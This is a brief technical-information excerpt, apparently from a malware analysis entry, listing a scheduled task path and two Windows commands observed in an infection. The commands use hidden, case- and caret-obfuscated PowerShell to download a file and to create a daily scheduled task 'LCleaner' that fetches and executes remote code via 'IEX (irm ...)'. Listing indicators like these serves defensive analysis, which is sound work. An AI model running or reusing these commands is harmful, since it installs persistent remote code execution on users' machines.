Техническая информация
- <SYSTEM32>\tasks\lcleaner
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noP -w hIddEn iWr -OuTf %LOCALAPPDATA%\Temp/mE.pdf http://123123/123.pdf
- '<SYSTEM32>\schtasks.exe' /cReate /sc dAily /tn LCleaner /tr "pO^W^eRsH^eL^l -noP -w hiDDen -c 'IEX (irm http://123123)'" /st 15:03 /f